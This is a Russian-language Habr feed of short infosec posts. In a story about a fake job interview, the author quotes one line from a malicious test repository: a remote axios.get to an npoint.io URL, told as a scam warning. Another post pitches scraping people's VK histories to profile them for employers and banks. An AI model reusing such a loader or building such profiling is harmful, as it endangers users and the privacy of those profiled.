Обновить

Информационная безопасность

Сначала показывать
Порог рейтинга

Краткий курс по выявлению уязвимостей

Как выглядит веб-приложение глазами атакующего, какие дыры в безопасности встречаются чаще всего и что с этим делать на практике? В статье «Основы безопасности веб-приложений: краткий «курс» по выявлению уязвимостей» наш AppSec BP собрал небольшое обучение по основам безопасности веб-приложений — от базового понимания архитектуры до превентивного выявления уязвимостей.​

Основы безопасности веб-приложений: краткий «курс» по выявлению уязвимостей
Как выглядит веб-приложение с точки зрения злоумышленника? Чтобы ответить на этот вопрос, сегодня мы...
habr.com

Разбираем, где именно в типичном веб-стеке возникают риски, как связаны между собой классы уязвимостей из OWASP Top 10 и что разработчикам, тестировщикам и безопасникам нужно проверять в первую очередь. Материал не ограничивается теорией: показан практический подход к поиску багов, типичные ошибки при настройке доступа, аутентификации, логирования и работы с внешними компонентами.​

Статья будет полезна backend и frontend разработчикам, тимлидам, DevOps-инженерам и начинающим AppSec-специалистам, которые хотят выстроить базовое «мышление безопасностью» и научиться видеть приложение так, как его видит злоумышленник.

Теги:
Рейтинг0
Комментарии0

Ключевые элементы киберустойчивости

Директор дирекции кибербезопасности ОТП Банка Антон Замараев выступил на сессии «Киберустойчивость как новая стратегическая метрика бизнеса» в рамках Киберсъезда 2025, прошедшего в Кибердоме в Москве. Он рассказал о состоянии киберустойчивости сегодня и поделился взглядом на будущее, в котором компании объединяют усилия, чтобы быстрее и эффективнее противостоять угрозам. Делимся основными мыслями.

1. Киберустойчивость — это не попытка избежать атак, которые все равно произойдут. Это способность максимально быстро устранить возникшую угрозу и восстановить работу сервисов. «Мы не можем полностью заблокировать работу сервисов или ограничить текущий процесс, бизнес должен работать всегда. Поэтому наша задача — встроить такие механизмы безопасности, которые позволяют обнаруживать и устранять угрозы без вреда для бизнеса», — сказал Антон.

2. В ОТП Банке процессы выстроены так, чтобы разработчики и devops-команды могли самостоятельно замечать и исправлять уязвимости. Это снижает нагрузку на профильных специалистов и ускоряет работу. При этом важной частью системы становится оперативный мониторинг: контроль нужен не только внутри инфраструктуры, но и на внешних сервисах, в том числе в клиентских зонах.

3. Сейчас ключевым элементом киберустойчивости становится регулярное тестирование негативных сценариев: «Важно понимать, из чего состоят процессы, какие системы за ними стоят и в какой последовательности нужно их восстанавливать. Это позволяет командам уверенно действовать даже в непривычных ситуациях».

4. Технологический горизонт: квантовые вычисления в ближайшие годы могут поставить под угрозу привычные методы шифрования. Подготовка к переходу на криптографию нового поколения — вызов, который весь рынок еще только начинает осознавать.

5. Завершая выступление, Антон сформулировал идею, которую назвал своей профессиональной мечтой: создание добровольной системы коллективной кибербезопасности. По его словам, компании могли бы передавать друг другу не формальные отчеты, а реальный опыт — как победили конкретную угрозу, какие методы сработали, какие нет. Такой обмен, считает он, сделал бы рынок заметно устойчивее.

«Каждая компания проходит один и тот же путь: сталкивается с похожими угрозами, решает похожие задачи. Если бы мы начали добровольно делиться экспертизой, мы бы все стали защищеннее и быстрее реагировали на новые вызовы», — отметил Антон Замараев.

Теги:
Рейтинг0
Комментарии1

В Telegram заработала система входа в аккаунт через Passkey, но только для российских номеров телефона. Ключевое преимущество Passkeys — возможность войти в аккаунт в одно касание, не вводя номер телефона и одноразовый код.

Как создать ключ:

  • Убедитесь, что у вас последняя версия мессенджера (Android — 12.2.10; iOS — 12.2.3).

  • Как и вход по почте, новую функцию нужно предварительно настроить. Для этого откройте Настройки › Конфиденциальность › Ключи доступа.

  • Если пункт «Ключи доступа» отсутствует, то эта опция недоступна для вашего аккаунта. На текущий момент Passkeys доступны только для аккаунтов, к которым привязан российский номер.

  • Нажмите «Добавить ключ доступа» и подтвердите его создание.

  • Устройство может запросить код экрана блокировки или биометрию, чтобы разблокировать хранилище ключей.

  • Созданный ключ появится в списке.

Как войти с помощью ключа:

  • На актуальной версии Telegram для Android или iOS приложение автоматически предложит выбрать ключ доступа для входа.

  • Если это не происходит, через несколько секунд под заголовком «Номер телефона» появится ссылка «используйте ключ доступа», на которую следует нажать.

  • Нажатие на кнопку запустит ваш менеджер паролей, который предложит выбрать ключ, проверит вашу личность по лицу, отпечатку пальца либо PIN-коду экрана блокировки, а затем передаст выбранный ключ мессенджеру.

  • Ключ доступа выполняет функции как номера телефона, так и одноразового кода подтверждения одновременно.

  • Если вы включили двухфакторную авторизацию для аккаунта, вам потребуется ввести свой облачный пароль, который вы задали самостоятельно.

Теги:
Всего голосов 3: ↑3 и ↓0+3
Комментарии3

Как я чуть не прошёл собеседование у «миллиардера» из Alchemy

Утро начиналось, как обычно — кофе, почта, LinkedIn.
И тут сообщение в linkedin:

«Здравствуйте! Мы хотим пригласить вас на позицию менеджера высшего звена в Alchemy!»

Листаю ниже — и кто, вы думаете, будет меня собеседовать? Сам Joseph Lau, вот его профиль.
Ну думаю, шутки в сторону. Миллиардер, всё серьёзно.

Назначаем митинг. У него всего одно свободное время — 9:30 утра по Лос-Анджелесу.
У богатых свои причуды. Я киваю в монитор: ладно, сыграем по-крупному.

Включаю режим «серьёзного специалиста»:
повторяю управление проектами, техстеки, quick refresh по Kafka — вдруг неожиданно спросят.
Даже откопал старые FIX-скрипты, которыми когда-то биржи Ближнего Востока подключал.

Волнуюсь, завариваю чай, сижу жду.
9:26. Google Meet пишет: «Ваш собеседник онлайн».

Подключаюсь — и вместо ожидаемого азиатского миллиардера вижу индуса. Сидит, улыбается в камеру. Глуповато.

Ну ладно, думаю, и Сатья Наделла индус. Бывает.

Парень оживляется, начинает интервью с комплиментов:

«Вы такой редкий специалист, мы давно искали именно вас!»

Я чуть растаял. Но быстро вернул фокус, когда он спросил, сколько я хочу зарабатывать.
Называю сумму. Он — ни моргнуть глазом:
— Отлично! Проверим ваши технические навыки.

Через секунду — ссылка на репозиторий:
👉 Bitbucket: alchemy-lab/p12-alchemy-mvp

«Посмотрите проект», — говорит.

Открываю. Пять абзацев, ноль смысла.
Пишу ему, что "документация" больше похожа на шутку.
Он улыбается — и бац, камера отвалилась.

— Простите, интернет плохой. Вы тоже выключите.

Думаю: ага, плохой интернет в Америке — классика.
Даже стало гордо за моего провайдера который даст фору всей Силиконовой долине.

Ладно.
Он предлагает запустить проект «вместе». Я не против.
Не стесняясь расшаренного экрана, открываю ChatGPT и прошу сгенерировать docker-compose.yml и Dockerfile для Next.js.

Он напрягся:
— Что вы делаете?
Я ему спокойно:
— Запускаю незнакомую дрянь в изолированной песочнице. Без лишних сюрпризов.

Через минуту проект крутится. Он смотрит, кивает, говорит:

«С вами обязательно свяжутся!» — и отключается.

Сижу, смотрю на экран. Что-то не даёт покоя.
Открываю код, бегло ищу глазами — и вот он, красавец:

const response = await axios.get('https://api.npoint.io/43c98e897c8540091987')

И тут всё стало на свои места.
Мой покойный нигерийский дядя с миллионами в банке воскрес — и решил поиграть в стартапера из Alchemy.

Дальше копать неинтересно.
Скучные жулики — даже без фантазии.

💡 Вывод:
Никогда не запускайте на своём компьютере никакой код — даже если вам прислали его «от имени Microsoft», Google или Alchemy.
Пока нет подписанного контракта и корпоративного ноутбука, — никаких экспериментов.

Берегите себя.
И помните народную мудрость:

Если красавица на х:% бросается — будь осторожен, триппер возможен.

P.S.
Да, всё это реально случилось.
А история про индуса — просто напоминание, что даже айтишная ловушка может начинаться с вежливого письма и золотого LinkedIn-профиля.

Теги:
Всего голосов 14: ↑12 и ↓2+15
Комментарии8

Если вы держите сети и ИБ на себе — не пропустите этот дайджест

Если вы отвечаете за сети и ИБ, но разрываетесь между BGP, VXLAN, Kubernetes, DevSecOps, SOC и SIEM — мы уже собрали для вас короткую «карту местности».

В дайджесте — бесплатные открытые уроки, базовые и продвинутые курсы по сетям и безопасности, подготовительные мини-курсы за 10 ₽ и подборка лучших статей по ИБ и сетям.

Заходите в дайджест, выберите свой уровень и тему и успейте записаться на уроки и курсы из ноябрьско-декабрьских наборов.

Теги:
Всего голосов 1: ↑1 и ↓0+1
Комментарии0

Коллега обнаружил забавный момент, который идёт в копилку "PVS-Studio — двигатель прогресса".

Слышали ли вы про то, что злобные C и C++ компиляторы могут удалить вызов memset в конце функции во время оптимизаций? У нас даже про это есть диагностика V597.

Это давно известная, но при этом живучая потенциальная уязвимость CWE-14: Compiler Removal of Code to Clear Buffers. В следующем коде компилятор удалит заполнение памяти нулями (вызов memset), так как после этого буфер не используется. Раз не используется, то заполнение буфера с точки зрения языка C++ не имеет каких-либо наблюдаемых эффектов и, следовательно, является лишим. Т. е. его можно и нужно удалить с целью оптимизации.

void sha1_hmac( unsigned char *key, int keylen,
                unsigned char *input, int ilen,
                unsigned char output[20] )
{
  sha1_context ctx;

  sha1_hmac_starts( &ctx, key, keylen );
  sha1_hmac_update( &ctx, input, ilen );
  sha1_hmac_finish( &ctx, output );

  memset( &ctx, 0, sizeof( sha1_context ) );
}

Код позаимствован из статьи про проверку проекта PPSSPP.

Проблема насущная, и для её решения в стандарт C23 внесли новую функцию memset_explicit, которая теперь обязательна для реализации в стандартной библиотеке вместо memset_s. Так вот, автор предложения (Miguel Ojeda, P1315) в своём документе сослался на нашу диагностику (ссылка N3).

И похоже, что он давно про нас знает, т. к. умудрился вставить ссылку ещё аж на старый сайт viva64.

Не зря столько лет говорим про memset. Приятно, что нас уже в proposal-ы затаскивают :)

Теги:
Всего голосов 15: ↑15 и ↓0+20
Комментарии2

Я сделал штуку, которая за час-полтора, если хватит денего на серверы то = за минуты, читает ВСЁ, что человек писал во «ВКонтакте» за 12 лет, и выдаёт честное ревью: добряк-ботан, токсичный вояка или шизо-экстремал. Без суда, без сплетен — только цифры и цитаты. Или проверить себя и понять, что нужно удалить некоторые посты от греха подальше. Может у тебя было время когда тебе нравился товарищ Ленин, а сегодня его запретили.

Как работает

  1. Вбиваешь ссылку на страницу (или свой ID).

  2. Сервис скачивает 100 % постов и комментов (официальное VK API, никакого взлома).

  3. Bert + detoxify считают токсичность, темы и сентимент.

  4. Через время получаешь PDF:
    – сколько негатива/позитива;
    – топ-темы (рыбалка, политика, IT, наркота, оружие);
    – риск-флаги (экстремизм, суицид, оружие, наркота) с прямыми цитатами;
    – динамику: «в 2022 стал злее на 37 %».

Пример из жизни
Проверил себя — 8 % токсичности, 0 флагов. Проверил соседа — 38 % токсичности, 1 постов про ствол.

Законно ли?
Собираю только публичное, без переписок. Профиль закрыт — пишет - доступа нет.

Зачем это вообще

  1. HR-отделы — чекнуть кандидата до интервью.

  2. Самопроверка перед поступлением/наймом.

  3. Родители — глянуть, чем реально живёт подросток.

  4. Банки/страховщики — оценить риск-поведение (агрессия/суицид = выше вероятность ДТП).

Что дальше
Если пост наберёт ≥ 300 «вверх» и 50+ комментов «хочу» — допиливаю приложение в продакшн версию для запуска. Если больше - докручу Instagram и TikTok. Своим варианты скидывайте в комменты.

Понадобиться ли вам такой «цифровой зеркал» или это очередной «пылесос для данных»? В комментариях — пишите, кого первым проверить: своё начальство, бывшего или самого себя :)

Теги:
Всего голосов 6: ↑0 и ↓6-6
Комментарии11

Привет, Хабр! Сегодня отмечается Международный день защиты информации. Поздравляем всех, кто стоит на страже цифровых рубежей и помогает компаниям защищаться от хакеров, инсайдеров и ИБ-инцидентов. Желаем увеличения ИБ-бюджетов, расширения штата службы безопасности и снижения числа подтвердившихся инцидентов!

А пока – делимся полезными материалами, как обучить сотрудников правилам ИБ, чтоб облегчить ежедневную рутину отделу безопасности.

Гайды по главным угрозам в сети – чтоб сотрудники не попадались на уловки кибермошенников:

Эффективные практики ИБ-ликбеза в коллективе:

С профессиональным праздником, коллеги!

Теги:
Всего голосов 1: ↑1 и ↓0+1
Комментарии0

Проверяем, взломали ли вас хакеры или ваш IP в списке ботнетов. Исследователи из GreyNoise выпустили сервис GreyNoise IP Check, который позволяет быстро узнать, залез ли кто-то в вашу сеть. Сканер считает ваш IP-адрес и начнет искать совпадения в известных ботнет-сетях, которые используют для DDoS-атак.

При обращении к GreyNoise IP Check пользователи получают один из трёх статусов. «Clean» означает, что подозрительной сканирующей активности с этим адресом не фиксировалось. «Malicious/Suspicious» сигнализирует о том, что IP замечен в сканировании и имеет смысл проверить устройства в локальной сети. «Common Business Service» указывает на принадлежность адреса сетевым защитным сервисам, корпоративной инфраструктуре или облачному провайдеру — в таких условиях активное сетевое сканирование внешних адресов и портов часто выполняется легитимными средствами мониторинга и тестирования безопасности. То есть не свидетельствует о заражении.

Если по IP‑адресу обнаружена какая‑либо активность, сервис показывает хронологию за 90 дней. Такая история помогает связать начало подозрительных сканов с установкой конкретного приложения, в том числе клиента для распределения трафика или сомнительной программы, и затем устранить источник проблемы.

Теги:
Всего голосов 5: ↑4 и ↓1+3
Комментарии4

4 раунда за 2 недели собеседований → оффер в пятницу → отказ в понедельник.
Причина?
Мой чертов LinkedIn, который я не обновлял пару лет.

Все любят истории успеха 🙃
Но вот вам история НЕ-успеха - и при этом моя собственная.

За последние 2 недели прошёл:
🟢 HR-интервью
🟢 Техническое интервью (жёсткое, но честное)
🟢 Интервью с командой
🟢 Интервью с CPO
🟢 Получил оффер. Подтвердили, что всё ок.

В пятницу вечером в почте лежал «Welcome aboard».
Я, честно - обрадовался. Уже mentally onboarded. И самое !главное! крутая команда, крутые задачи впереди, возможность строить инфраструктуру с нуля и возможность топить в ИБ (реальную а не бумажную) - ну восторг жеж. Да я уже запланировал фаст-вины на первые 30 дней!

А в понедельник приходит письмо:
«СТО принял решение не двигаться дальше. Ваш опыт в резюме не соответствует тому, что в LinkedIn».

Что?! Какого?!
LinkedIn, который я не вёл несколько лет?
Площадка, которую большинство инженеров обновляет раз в эпоху?

Я объяснил, что могу подтвердить опыт трудовой, рекомендациями, стеками проектов, GitLab’ами, CI/CD пайплайнами - чем угодно.
Ответ:
«Решение финальное».

И вот честно - я не злюсь. (да что уж там, бесился первые пол часа)
Но вся эта ситуация подсветила кое-что важное:
Нужно делать то, что приведет напрямую к приему на работу, я повторил всю теорию, прошелся по практике - а надо было резюме пилить.

*Мой личный инсайт* В эпоху, когда DevOps пишет IAC, придумал собственный термин, что карьера тоже - Career As a Code, и её надо поддерживать.

Так что да: обновляю LinkedIn.
Да: выкладываю эту историю.
Да: остаюсь мотивирован строить системы, усиливать DevOps и DevSecOps, выстраивать безопасность, SRE, процессы, документирование, хаос-устойчивость - всё то, в чём я реально силён.

Может я единственный, кто еще живет по старому, а все остальные давно проснулись в матрице?

Как часто вы обновляете ЛН?

Теги:
Всего голосов 9: ↑6 и ↓3+4
Комментарии9

Отзыв на книгу "Кибербезопасность: правила игры. Как руководители и сотрудники влияют на культуру безопасности в компании" Эллисон Сэрра.

Уже который раз беру книгу по теме своей профессиональной деятельности. Вроде как это полезно для развития. И уже который раз разочаровываюсь, потому что не могу почерпнуть полезных материалов. Даже, например, громкие интересные кейсы кибератак. И этого не встречаю.

Книга бесполезна для профессионалов в области информационной безопасности. Для всех остальных несёт тоже не очень много пользы. Разве что для тех, кто живёт «в вакууме» без соцсетей, новостей и технологий. Несколько интересных фактов из сферы кибербезопасности. И дальше — наши любимые маркетинговые штучки бизнес-литературы: интересные факты из истории, бизнеса, которые по смыслу очень издалека прикручивают к теме кибербеза, просто по аналогии. Но повествование, поверхностно касающееся названия самой книги, несёт за собой потраченное время читателя. Я бы назвала это эссе-рассуждением на тему "хайпового" кибербеза. Но автор написала и продала нам это как книгу. И тут уже напрашивается придирка к тому, что пишет это не профессионал в ИБ, а именно маркетолог в мире ИБ.

Говорят, это распространённая проблема бизнес-литературы: вместо глубины — «водянистые» рассуждения и пересказ очевидных вещей.

Хочется уточнить, почему мне не понравилась книга. Потому что я часто хожу на отраслевые конференции по информационной безопасности. И видела там много. Чаще всего там или обозревают изменения в законодательстве, говорят о важности защиты, о хакерских атаках, ну и параллельно продают нам услуги или средства по защите информации. Многие ходят больше себя показать. Буквально. Или удовлетворить потребность в общении, которая переходит границы разумного. Но сейчас не об этом. А о том, что многие сейчас занимаются маркетингом, прикрывая это конкретной сферой деятельности. И в данном случае — это сфера кибербеза. И в этом не было бы ничего плохого, если бы это всё тоже не переходило границы разумного. Экспертиза подменяется долгими историями без реальной ценности. А болтуны тратят наше время. Да, маркетологи поднимают важные вопросы о защите. Но сколько можно поднимать, а не предпринимать или давать конкретные пути решения.

Мне тоже прилетало за некомпетентность здесь в блоге. Однажды была свидетелем, как на конференции чуть не случилась драка, когда спикер рассказывал про полезные бесплатные инструменты по ИБ, а один из слушателей не мог сдержаться от критики и буквально с места кричал: "туфта". Но... всё же, часто авторы, не обладающие глубокими познаниями в предметной области, пытаются продать свои продукты, маскируя их под экспертные издания. Это и приводит к размыванию границ профессионализма и уменьшению доверия. Причем не только к подобным материалам, но в целом к сфере.

Но возможно, проблема, описанная мной, немного преувеличена, и во мне просто протестует, что мои ожидания не совпали с реальностью.

Теги:
Всего голосов 3: ↑3 и ↓0+4
Комментарии0

Отзыв на книгу "Взломать всё. Как сильные мира сего используют уязвимости систем в своих интересах" Брюс Шнайер

Я села читать эту книгу как специалист по инфобезопасности. Да, я верю в то, что полезно читать профессиональную литературу. Планировала даже рассказать пользователям про крупные атаки и утечки в рамках обучений и вебинаров по повышению осведомленности. В итоге я хотела узнать про хакерство, а узнала про хитросплетения американской государственной системы и законодательство, которое целиком состоит из лоскутных решений и нюансов(по мнению автора).

Шнайер пишет не про киберпанк и даже не про киберреальность (но сыграл все же на «хайповых темах»), а про то, как уязвимости встроены в саму ткань власти, денег и технологий. И здесь нет сказок про «гениальных хакеров».

По сути, книга представляет собой сборник философских рассуждений автора, основанных на известных исторических фактах. Очень мало информации о реальных громких хакерских атаках в привычном значении этого слова.
И да: «Взлом — это не только про технологии». А «Безопасность — это не технология, а баланс сил». Пока у кого-то есть интерес оставлять системы уязвимыми — они будут взламываться.

Но сложно не согласиться, что обеспечение безопасности — это не просто техническая проблема, а сложное равновесие, зависящее от экономических, юридических и культурных факторов.

P.S. И да, об этом написано на обложке книги, но с детства нас учат "не судить о книге по обложке".

Теги:
Всего голосов 5: ↑3 и ↓2+3
Комментарии0

Большинство утечек по вине сотрудников в России умышленные

По данным InfoWatch, в 2025 году большинство утечек данных в компаниях по вине сотрудников носят умышленный характер, причем в России доля спланированных инцидентов в десять раз выше мировой, а инсайдеры втрое чаще используют мессенджеры. С 2022 года зарегистрировано 1523 случая компрометации данных из-за действий инсайдеров.

Подробнее — по ссылке.

Теги:
Всего голосов 1: ↑1 и ↓0+1
Комментарии1

Ближайшие события

Разработали фреймворк для оценки зрелости безопасности ИИ-систем

Сегодня безопасность систем ИИ становится ключевым фактором, определяющим уровень доверия к ним. Для того чтобы организация смогла справиться с этими вызовами, ей необходимо, в первую очередь, определить текущий уровень зрелости и оценить свои слабые и сильные стороны.

Команда Swordfish Security разработала Swordfish: Secure AI Maturity Model (SAIMM) —фреймворк, который помогает компаниям системно выстраивать безопасность ИИ-решений и снижать риски на всех этапах жизненного цикла разработки.

Мы обобщили опыт внедрения ИИ-систем в корпоративной среде, результаты работы с заказчиками из разных отраслей и текущие международные практики безопасности — от OWASP и NIST до MITRE ATLAS. На основе этого сформирована модель зрелости, охватывающая ключевые аспекты безопасности современных ML- и LLM-систем, включая агентные сценарии.

Читать фреймворк

SAIMM построен на основе пяти базовых доменов в области безопасности ИИ и одного специализированного в области агентных систем. Для каждого домена предусмотрена дорожная карта с действиями, артефактами и техническими мерами.

Домены SAIMM:

1️⃣ Управление и риск-менеджмент
Политики, роли, риск-аппетит, процедуры аудита, внутренние стандарты и этические принципы.

2️⃣ Защита данных и конфиденциальность
Качество, происхождение, доступы, ПДн и локализация. Надежное обучение моделей и эксплуатация ИИ.

3️⃣ Безопасность модели
Устойчивость моделей к атакам любого рода и защита артефактов модели от несанкционированного доступа.

4️⃣ Безопасность цепочек поставок
Встроенная безопасность в конвейер разработки ПО. Контроль состава и безопасности всех внешних компонентов: модели, библиотеки, датасеты.

5️⃣ Инфраструктура и операционная безопасность
Надежное функционирование системы, устойчивость к сбоям, дрейфу и атакам. Организация реагирования на инциденты.

6️⃣ Безопасность агентных систем
Контроль автономного поведения агентов для предотвращения нежелательных действий и рисков.

SAIMM выступает практической картой зрелости безопасности ИИ, позволяющей не просто измерять готовность, но и выстраивать стратегию безопасного внедрения и масштабирования искусственного интеллекта в корпоративной среде.

Теги:
Всего голосов 4: ↑3 и ↓1+2
Комментарии1

На МКС российский космонавт, впервые в истории человечества, самозапретил себе оформление СИМ-карты прямо из космоса. 15 ноября 2025 года космонавт Алексей Зубрицкий с помощью ноутбука HP Zbook 15, предоставленного НАСА, вошёл в интернет через американскую систему спутников TDRSS, открыл портал "Госуслуг", и прямо с борта МКС и воспользовался сервисом самозапрета на оформление СИМ-карты из перечня меню «Жизненных ситуаций».

Теги:
Всего голосов 5: ↑1 и ↓4-3
Комментарии7

Как защищать данные в CRM-системе на всех уровнях? Расскажем через 30 минут на вебинаре

Через полчаса, в 12:00 мск, на вебинаре Selectel и «Мегаплан» разберем каждое слагаемое безопасности данных, поделимся правилами и практиками защиты данных на всех уровнях. Особенно полезно будет специалистам по информационной безопасности, администраторам, СТО и владельцам бизнеса.

В центре внимания:

👉 Безопасность IT-инфраструктуры: обсудим риски и концепцию совместной ответственности за безопасность и защиту от DDoS-атак. Поделимся чек-листом безопасной IT-инфраструктуры.

👉 Безопасность CRM-системы: поделимся способами безопасной работы с корпоративными данными.

Подключайтесь к трансляции:

🎞 YouTube

🎞 VK

Теги:
Всего голосов 2: ↑1 и ↓1+2
Комментарии0

Операторы «Мегафон», «Билайн» и Т2 начали рассылать уведомления пользователям с инструкциями о новых правилах: блокировка СИМ‑карт граждан РФ на 24 часа в рамках «периода охлаждения» (отключение доступа к мобильному интернету и СМС) будет происходить сразу по возвращении в домашнюю сеть (например, после приезда из-за границы). В Ассоциации туроператоров России уточнили, что такие меры вводятся по требованию регуляторов для усиления безопасности.

Ссылки для авторизации пользователей в сетях операторов:

Теги:
Всего голосов 2: ↑1 и ↓10
Комментарии0

Оказывается, "умные" колонки нас действительно подслушивают!

Конечно, это давно известный факт, а не новость. Новостью для меня в публикации Россиян предупредили о пугающей способности умных колонок стало предостережение пользователей, что "Рядом с голосовыми помощниками не стоит разговаривать на чувствительные темы ..."

Я бы рекомендовал не обсуждать конфиденциальную или чувствительную информацию непосредственно с нейросетью или рядом с «умными» устройствами. Их работа по своей сути заключается в том, чтобы постоянно «прислушиваться» к окружению

И вот теперь интересно, что конкретно имелось ввиду под "чувствительными темами"? Относится ли это только к таргетированию рекламы или способы использования подсушенной информацией у подобной умной техники значительно шире?

Теги:
Всего голосов 4: ↑4 и ↓0+6
Комментарии7

В ОТП Банке предложили создать единый антискам-хаб на Госуслугах для защиты жертв мошенничества

Рустам Габитов, начальник центра безопасности финансовых операций ОТП Банка, выступил на 12-й ежегодной конференции «Антифрод в финансовых организациях» с докладом об общесистемных антифрод-инициативах, одна из которых призвана усовершенствовать механизмы координации действий пользователя, столкнувшегося с мошенничеством.

В качестве основного решения Рустам Габитов озвучил предложение создать на Едином портале государственных услуг (ЕПГУ) единый антискам-хаб, который агрегирует все необходимые действия гражданина, пострадавшего от мошенничества.

«Разработка антискам-страницы с комплексной заявкой и сквозной идентификацией через ЕСИА позволит формировать сразу пакет заявлений в МВД и другие инстанции, минуя многоступенчатый бюрократический лабиринт», — пояснил Рустам Габитов, отметив, что сейчас пострадавшему приходится применять множество сервисов для решения одного инцидента, при этом информация, предоставленная в одну инстанцию часто не передается автоматически в другие. «Это снижает вероятность успешного возврата средств и расследования», — отметил эксперт.

Первый этап внедрения изменений предполагает налаживание прямого взаимодействия «Банк – МВД» через использование существующих правовых рамок, включая подачу заявлений от имени клиента на мвд.рф с его согласия. Второй этап — это сбор и синхронизация ключевых данных для создания автоматизированного механизма атрибуции мошенников и выявления связей между ними. «На базе этой первичной интеграции и накопленных данных станет возможным поэтапное формирование единой системы с участием всех заинтересованных ведомств, — пояснил Рустам Габитов.

В развитие инициативы, предполагается запустить систему замкнутого цикла по формированию «цифрового следа мошенников». В этом случае, гражданин будет подавать комплексную заявку через ЕПГУ с возможностью дополнять ее новыми данными, которые будут поступать всем уполномоченным органам. При этом полученные знания будут использоваться для информирования граждан и автоматической блокировки мошеннической инфраструктуры.

Важным элементом системы станет TTP (Tactics, Techniques, Procedures) анализ и профилирование тактик, техник и процедур, который встраивается в антифрод-сервисы платежных систем и превентивный контроль строится на основе единого идентификатора клиента, например, ИНН. Сейчас на практике это используется для защиты инфраструктуры организаций. Теперь эта опция доступна для защиты конкретного пользователя услуг. «Такой подход позволяет не только оперативно реагировать, но и постоянно углублять понимание методов злоумышленников, чтобы совершенствовать предупреждающие меры», — отметил он.

В заключение Рустам Габитов подчеркнул, что предлагаемая модель соответствует логике существующих регуляторных требований и задачам основных направлений развития информационной безопасности в кредитно-финансовой сфере, а ее реализация позволит перейти от разрозненных действий к централизованной, интеллектуальной и проактивной системе защиты прав граждан.

Теги:
Рейтинг0
Комментарии0

Как выстроить эффективную систему ИБ с нуля? Делимся лайфхаками по защите бизнеса!

Привет! Мы вместе с GlobalCIO выпустили большой спецпроект – руководство по построению целостной ИБ-стратегии. Там мы делимся опытом и ИБ-лайфхаками, помогаем узнать:

  • Как защитить главные корпоративные активы — данные, рабочие станции и инфраструктуру — создав надежное ядро безопасности.

  • Как построить комплексную безопасность, чтобы системы защиты усиливали друг друга для проактивного выявления угроз.

  • Как выполнить требования регуляторов минимальным набором средств, избежав штрафов и лишних затрат.

Простыми словами – информация в спецпроекте поможет опытным и начинающим ИБ-специалистам систематизировать работу, снизить нагрузку на отдел, закрыть требования регуляторов и бреши в защите, оптимизировать бюджет и увидеть всю картину внутренней безопасности. К тому же мы регулярно обновляем спецпроект свежей регуляторикой и аналитикой, ИБ-новостями и трендами в защите данных, чтобы вы всегда были в курсе событий!

Переходите по ссылке и добавляйте в закладки, чтобы не потерять!

Теги:
Всего голосов 4: ↑4 и ↓0+4
Комментарии0